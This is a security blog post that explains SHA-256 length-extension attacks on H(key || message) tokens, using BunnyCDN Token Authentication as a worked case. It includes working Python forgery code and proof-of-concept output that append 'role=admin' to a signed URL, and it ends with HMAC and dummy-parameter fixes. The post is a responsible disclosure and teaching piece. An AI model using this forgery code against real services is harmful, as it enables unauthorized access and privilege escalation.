Length-extension attacks are still a thing


SHA-256 is probably the most widely used hash function today. It has resisted all known practical cryptanalytic attacks, benefits from hardware acceleration on many CPUs, is implemented almost everywhere, and complies with standards like FIPS. It seems like a natural, safe choice for nearly everything.

The intuition many people have is that because it’s computationally infeasible to find an input that produces a specific hash (a preimage), it must also be impossible to compute a valid hash for a related input.

Unfortunately, that intuition is wrong.


The Merkle–Damgård Construction

SHA-256, SHA-512, and many other legacy hash functions are built using a design called the Merkle–Damgård construction.

By design, this construction has a property that cryptographers learn about very early, but that many developers are still unaware of: it is vulnerable to length-extension attacks.

Given the value of H(x) and the length of x, it’s possible to compute H(x || pad || y) for any y, where pad is the padding the hash function appended internally to x, all without knowing x.
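The padding involved is fully determined by the length of the input, which is why an attacker who knows (or guesses) that length can reproduce it. Here is a minimal sketch for SHA-256; the function name md_padding and the sample values are illustrative choices, not something taken from the article:

```python
import struct

def md_padding(message_len: int) -> bytes:
    """Padding SHA-256 appends to a message that is message_len bytes long."""
    # One 0x80 byte, then zero bytes until the length is 56 mod 64,
    # then the original length in bits as a 64-bit big-endian integer.
    zeros = (55 - message_len) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack(">Q", message_len * 8)

# Hypothetical example values: only the total length matters for the padding.
x = b"secret key" + b"logged=true"
padded = x + md_padding(len(x))

# The padded input is always a whole number of 64-byte blocks.
print(len(padded) % 64)  # 0
```

After processing those blocks, the internal state of the hash is exactly the digest that gets published, and that is the starting point an attacker needs.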


How the Attack Works

Consider this example:

H(secret key || "logged=true")

Using SHA-256 as the hash function H, the result is a 256-bit value that appears random to anyone who doesn’t know the secret key.

Intuitively, it should be impossible to compute a valid hash for a different message without the secret key, which makes this construction appealing for simple authentication schemes.

A typical use case is URL or cookie authentication tokens. For example, a server might issue tokens like:

token = H(secret key || "logged=true")

Then it verifies incoming requests by checking that the provided token matches what it would compute internally.
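As a rough sketch of what such a scheme looks like in code, assuming a 16-byte secret and raw byte messages (SECRET_KEY, issue_token and verify_token are hypothetical names, not any particular service's API):

```python
import hashlib
import hmac

SECRET_KEY = b"0123456789abcdef"  # hypothetical secret, known only to the server

def issue_token(message: bytes) -> bytes:
    # Vulnerable pattern: the token is H(key || message) with a plain hash.
    return hashlib.sha256(SECRET_KEY + message).digest()

def verify_token(message: bytes, token: bytes) -> bool:
    # Recompute the token and compare in constant time.
    return hmac.compare_digest(issue_token(message), token)

token = issue_token(b"logged=true")
print(verify_token(b"logged=true", token))   # True
print(verify_token(b"logged=false", token))  # False
```

The verification itself is fine; the weakness lies entirely in how the token is derived.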

This approach is common in web services, including CDNs.


A Real Example: BunnyCDN Token Authentication

Bunny.net provides a convenient feature called BunnyCDN Token Authentication, documented in “How to sign URLs for BunnyCDN Token Authentication”.

With this feature, the CDN can automatically reject unauthorized requests based on tokens computed from query parameters and a secret key.

However, SHA-256 allows something unexpected. Given H(secret key || "logged=true"), it’s possible to compute H(secret key || "logged=true" || padding || additional data) without knowing the secret key.

That means authentication tokens based on this scheme can be completely broken.


Proof of Concept

Here’s a simple proof of concept and its output:

Original query: ?file=report.pdf
Original token: mwKyexgzJiB53wvtaU5WLQqiXELRL33ZA50UpaDpT7o=
Successfully forged token!
Guessed secret length: 16 bytes
Forged token: +WIhApyRDad62D3BsDnZk926mxUB+3LGEhNK7UEmnIQ=
Forged query bytes: b'?file=report.pdf\x80...%26role%3Dadmin'
Server still accepts forged token: True

The second token was computed without the secret key, using only the original token.

An attacker could append role=admin to the query string and generate a valid token for the new URL. Because the token is valid, the server would accept it.
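The following is a self-contained sketch of how such a forgery can be computed. It is not the proof of concept that produced the output above: it works on raw bytes and raw digests rather than URL-encoded queries and base64 tokens, and the secret, the helper names and the assumption that the attacker has guessed the secret length correctly are all illustrative. In practice an attacker would simply try each plausible length.

```python
import hashlib
import struct

MASK = 0xFFFFFFFF

def first_primes(n):
    primes, c = [], 2
    while len(primes) < n:
        if all(c % p for p in primes):
            primes.append(c)
        c += 1
    return primes

def icbrt(n):
    # Integer cube root by binary search.
    lo, hi = 0, 1 << ((n.bit_length() + 2) // 3)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= n:
            lo = mid
        else:
            hi = mid - 1
    return lo

# SHA-256 round constants: the first 32 fractional bits of the cube roots
# of the first 64 primes, derived here instead of being hard-coded.
K = [icbrt(p << 96) & MASK for p in first_primes(64)]

def rotr(x, n):
    return ((x >> n) | (x << (32 - n))) & MASK

def compress(state, block):
    # The SHA-256 compression function applied to one 64-byte block.
    w = list(struct.unpack(">16I", block))
    for i in range(16, 64):
        s0 = rotr(w[i - 15], 7) ^ rotr(w[i - 15], 18) ^ (w[i - 15] >> 3)
        s1 = rotr(w[i - 2], 17) ^ rotr(w[i - 2], 19) ^ (w[i - 2] >> 10)
        w.append((w[i - 16] + s0 + w[i - 7] + s1) & MASK)
    a, b, c, d, e, f, g, h = state
    for i in range(64):
        t1 = (h + (rotr(e, 6) ^ rotr(e, 11) ^ rotr(e, 25))
              + ((e & f) ^ (~e & g)) + K[i] + w[i]) & MASK
        t2 = ((rotr(a, 2) ^ rotr(a, 13) ^ rotr(a, 22))
              + ((a & b) ^ (a & c) ^ (b & c))) & MASK
        a, b, c, d, e, f, g, h = (t1 + t2) & MASK, a, b, c, (d + t1) & MASK, e, f, g
    return [(s + v) & MASK for s, v in zip(state, (a, b, c, d, e, f, g, h))]

def md_padding(message_len):
    zeros = (55 - message_len) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack(">Q", message_len * 8)

def extend(digest, original_len, suffix):
    """Return (glue padding, forged digest) given H(m) and len(m) only."""
    glue = md_padding(original_len)
    # The published digest is the internal state after the padded original.
    state = list(struct.unpack(">8I", digest))
    processed = original_len + len(glue)
    tail = suffix + md_padding(processed + len(suffix))
    for i in range(0, len(tail), 64):
        state = compress(state, tail[i:i + 64])
    return glue, struct.pack(">8I", *state)

# Server side (hypothetical values).
secret = b"0123456789abcdef"
message = b"?file=report.pdf"
token = hashlib.sha256(secret + message).digest()

# Attacker side: uses only message, token and a guessed secret length of 16.
suffix = b"&role=admin"
glue, forged = extend(token, 16 + len(message), suffix)
forged_message = message + glue + suffix

# Server-side check of the forged pair.
print(hashlib.sha256(secret + forged_message).digest() == forged)
```

Note that the forged message necessarily contains the glue padding between the original query and the appended data, which matches the \x80... bytes visible in the forged query above.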


Why This Matters

This vulnerability isn’t specific to BunnyCDN. It’s a common pattern in many systems that use raw hash functions for authentication.

The fact that a secure-looking hash function like SHA-256 allows this is counterintuitive, and it’s likely that many other services are currently exposed to the same risk.


How to Do It Right

The most common solution is to use the HMAC construction, which is widely supported and well-studied.

HMAC explicitly separates the key and the input, preventing this type of attack.
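A minimal sketch of the same token scheme using HMAC-SHA-256 from Python’s standard library; SECRET_KEY, issue_token and verify_token are hypothetical names chosen for illustration:

```python
import hashlib
import hmac

SECRET_KEY = b"0123456789abcdef"  # hypothetical secret, known only to the server

def issue_token(message: bytes) -> bytes:
    # HMAC takes the key and the message as separate inputs.
    return hmac.new(SECRET_KEY, message, hashlib.sha256).digest()

def verify_token(message: bytes, token: bytes) -> bool:
    return hmac.compare_digest(issue_token(message), token)

token = issue_token(b"?file=report.pdf")
print(verify_token(b"?file=report.pdf", token))             # True
print(verify_token(b"?file=report.pdf&role=admin", token))  # False
```

Because the outer hash in HMAC is keyed as well, knowing a token does not give an attacker a usable internal state to continue from.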

Alternatively, you can use a modern hash function or MAC that is not vulnerable to length extension. Good options include: SipHash, BLAKE2, BLAKE3, KMAC, and SHAKE / TurboSHAKE.
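As one example from that list, BLAKE2 has a built-in keyed mode that Python exposes through hashlib. This is a sketch under the same assumptions as before (hypothetical key and function names, 32-byte tokens):

```python
import hashlib
import hmac

SECRET_KEY = b"0123456789abcdef"  # hypothetical secret; blake2b accepts keys up to 64 bytes

def issue_token(message: bytes) -> bytes:
    # Keyed BLAKE2b acts as a MAC directly, with no HMAC wrapper needed.
    return hashlib.blake2b(message, key=SECRET_KEY, digest_size=32).digest()

def verify_token(message: bytes, token: bytes) -> bool:
    return hmac.compare_digest(issue_token(message), token)

token = issue_token(b"?file=report.pdf")
print(verify_token(b"?file=report.pdf", token))             # True
print(verify_token(b"?file=report.pdf&role=admin", token))  # False
```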

Virtually all modern primitives avoid this issue. One notable exception is AREION-MD.

Another valid approach is to put the key at the end instead of the beginning. Suffix-keyed MD constructions were recently proven to be secure. Although the proof assumes the key fills the last block, padding is unlikely to be necessary in practice.


Mitigation for BunnyCDN

In BunnyCDN’s specific case, there’s an important detail: the hash is computed on query parameters after they are lexicographically sorted.

An attacker can only append data, not insert it before existing parameters. So if a file parameter already exists, an attacker could add role=admin, which sorts after file, but not admin=true, which sorts before it and therefore wouldn’t be a suffix.

This allows for a simple mitigation that doesn’t require server-side changes and doesn’t break backward compatibility: add a dummy parameter named ~ to the query string.

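For example, a query such as ?file=report.pdf could be signed and requested as something like ?file=report.pdf&~=1, where the value given to the dummy parameter is arbitrary.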

The tilde character ~ comes lexicographically after all alphanumeric identifiers, so it will always be sorted last. This makes it impossible for an attacker to add meaningful parameters afterward.
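The ordering claim is easy to check. The sketch below assumes parameter names are compared by code point, as Python’s sorted does for strings; the parameter names are made up for illustration, and the exact sorting and encoding rules BunnyCDN applies are not reproduced here:

```python
import string

# Hypothetical query parameters, including the dummy "~" parameter.
params = {"file": "report.pdf", "~": "1", "expires": "1700000000"}

# Sorting by name puts "~" last.
print(sorted(params))  # ['expires', 'file', '~']

# "~" (0x7E) sorts after every ASCII letter and digit.
print(all(ch < "~" for ch in string.ascii_letters + string.digits))  # True
```

Any parameter an attacker tries to append with an ordinary alphanumeric name would have to sort before ~, so it cannot appear as a suffix of the signed data.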

It’s a mitigation rather than a full fix, but it’s simple and effective for existing deployments.


Conclusion

Length-extension attacks are not new, but they still catch many systems off guard. Any service that builds authentication tokens using H(key || message) with SHA-256, SHA-512, or similar functions is likely vulnerable.

Using HMAC or a modern hash/MAC function is the proper fix. For systems like BunnyCDN, adding a parameter such as ~ at the end of the query string provides a quick mitigation.

Bunny engineers are aware of the issue and are working on a fix. They were also informed about the possible mitigations, including the simple documentation change described above.
